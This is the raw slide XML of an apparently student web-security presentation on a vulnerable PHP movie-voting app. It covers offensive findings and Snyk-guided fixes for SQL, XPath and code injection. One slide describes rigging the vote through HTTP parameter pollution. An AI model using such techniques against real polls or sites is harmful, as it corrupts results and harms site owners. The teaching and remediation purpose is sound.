              <a:t>In this web app that uses HTTP requests you can vote for your favorite movie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56B2D241-18DC-4F4F-AE41-DA2CC1680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2" y="3429000"/>
            <a:ext cx="3391291" cy="888195"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF7A00C8-A17F-AF4C-8CD7-DD7E34176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795" y="3059307"/>
            <a:ext cx="3697400" cy="3180174"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F9FA189-4206-6380-7F62-3E8E5E2DE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087" y="3429000"/>
            <a:ext cx="3367473" cy="881665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F987C564-4D64-89F7-D8D3-99F887E02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171" y="6334278"/>
            <a:ext cx="4696480" cy="304843"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8332306-6693-8199-23FC-084E4CCC9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404" y="4537398"/>
            <a:ext cx="3954838" cy="223991"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="391014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D915-5030-8296-9582-97AC21F99C71}"/>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94C0FEE8-0A75-C50E-191A-B9E7A66D27A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The app does not filter out query characters (I could name myself ampersand)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B69194F-CDA4-C90D-B7DA-92BD179C6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7774" y="3019166"/>
            <a:ext cx="6973273" cy="3715268"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1838755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E611E-6CA1-AD08-E72D-FD62C3E2AC12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Approach on security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90A113E6-89F1-0061-DA0B-FA13EA24CE63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Mixed approach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Offensive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Terec Andrei</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Popovici George-Ioan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Defensive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Pop David</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2616896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629B-3916-3359-3CBF-D1D7D6C4F619}"/>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B2B9155B-0FDC-59D6-AB38-B01F7D323B22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We want the Iron Man (which has the id of 2) movie to always win, so we abuse the fact that PHP only registers the last appearance of a parameter in an HTTP request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BD3831B-AC45-64A0-5075-8EBE9A7EE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2" y="4151217"/>
            <a:ext cx="5144218" cy="1362265"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3818747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2D0D-2C7A-84EB-2B8A-32FB164E661E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP Parameter Pollution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27E847AD-1D30-1B91-BC7C-CF55285F6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3504074"/>
            <a:ext cx="4772484" cy="366051"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CBAD184-0A50-3933-254D-CE8058EBE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235" y="3084642"/>
            <a:ext cx="4571835" cy="1204913"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{049A4EB6-54FA-C6F9-43C7-3121EB9FF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4510065"/>
            <a:ext cx="5601482" cy="314369"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2052060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DAE9-3366-3BF7-F556-AD43C1CAC02B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP Parameter Pollution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D0B458E-972E-3D6E-8AFE-D825ADEC0403}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two ways to remediate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>this are to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ensure that user input is URL-encoded before it is embedded in a URL or throw an error in case of multiple parameters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1600688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9567-F965-E4A1-B0A7-83257D8AF5AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DEFENSIVE APPROACH</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A485E7D5-E44C-49F7-1DE6-9CC449645D0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For the defensive approach, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Snyk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> scanner was used. The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Snyk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> scanner is a Static Application Security Testing tool which detects vulnerabilities in the code. There are many benefits of using a such tool:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bring the security phase closer to the development phase in the lifecycle of the project.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Catch vulnerabilities faster and losing less money than creating breaches into the production environment.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="236667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FD35-E6B5-24B9-C097-45480E42579E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DEFENSIVE APPROACH</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5768DF0D-0CA3-86FE-F046-9C3400459654}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Initial vulnerabilities in the project, before solving:</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B584E14A-91C1-BDD7-1B3D-30A3498DB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617" y="2925479"/>
            <a:ext cx="5580808" cy="2732938"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="231439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5D6BE-C9E2-450F-F0F8-D4BADEE9B883}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL Injection (defensive)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="A screenshot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{625547AB-541F-8D34-A23E-68D74AD7A5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5512" y="3194396"/>
            <a:ext cx="4060350" cy="3541712"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="A screenshot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68E24893-7DB2-2C7F-833D-2265B8F8A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63604"/>
            <a:ext cx="8155512" cy="3079752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64CE7709-03EC-AB4B-3999-5395B7D2AD87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2097088"/>
            <a:ext cx="12192000" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The scanner suggests that the code contains an SQL Injection vulnerability, which is indeed true. The scanner also suggests some examples of fixes, which solves the problem. The scanner suggests from using a certain method, to moving into prepared statements.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="419952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8E4B0-ADB9-4D2E-3E4B-AD26CEF4B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9EE69-0878-41E7-C2EB-130DA328C931}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL Injection (defensive)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Content Placeholder 7" descr="A screen shot of a computer code&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{359E5DFB-34C9-BD95-8DEA-58ACD8EC64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23" y="4867643"/>
            <a:ext cx="6163535" cy="1400370"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B28A9012-BD3C-976A-ED8F-9D77272B3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2945187"/>
            <a:ext cx="6057056" cy="3844912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A948E13-40F9-4AF2-EAC9-5AAE20E3EBDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1738265"/>
            <a:ext cx="12151468" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After the fix is implemented, there is no longer a vulnerability found by the scanner. This also can be seen in the frontend, as an Error appears instead of the data leaks.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="57497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49F1-AAC0-6FF6-7009-00E19A498327}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Xpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - defensive</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC8926D4-7608-3215-8ECC-EB9337B00C8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Xpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> vulnerability refers to traversing XML documents and exposing data which is not intended.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="A screenshot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C22F780-0CCD-11A8-1E92-3E6AFAE80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7617" y="2870863"/>
            <a:ext cx="3490896" cy="4426230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Content Placeholder 4" descr="A screenshot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA0F9C99-2FC8-C6A3-70C0-038705023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96" y="3243860"/>
            <a:ext cx="7690678" cy="3541712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="185372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C14A-1F3A-5B4B-10CD-A97A87FFF72D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XPATH - Defensive</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38777F93-12C4-AE16-F699-A7A313E29EF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1883121"/>
            <a:ext cx="12122590" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The scanner suggests to use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>str_replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to replace the single quotes, which worked and the vulnerability do not longer affects the data leaks.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="A screenshot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75CBAD58-5C2E-AF33-440F-ADA6F844A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23" y="3260378"/>
            <a:ext cx="4555514" cy="3412026"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Content Placeholder 11" descr="A screen shot of a computer code&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{192A04E0-A137-63ED-1767-B3DC958AE0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236" y="3794055"/>
            <a:ext cx="6725589" cy="1524213"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="155244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DBAE-5667-7A23-469F-0EBA24045099}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code injection - defensive</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
